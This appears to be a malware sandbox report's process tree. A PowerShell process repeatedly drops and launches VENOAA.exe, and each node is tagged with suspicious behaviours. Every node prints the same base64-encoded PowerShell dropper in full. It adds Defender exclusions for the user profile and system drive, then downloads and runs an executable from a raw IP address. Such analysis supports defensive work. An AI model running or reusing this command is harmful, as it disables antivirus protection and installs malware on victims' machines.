        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        8⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        10⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3224
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        12⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:8
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        14⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        16⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4884
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        18⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        20⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        22⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        23⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        24⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        25⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        26⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3608
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        27⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        28⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        29⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        30⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1624
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        31⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
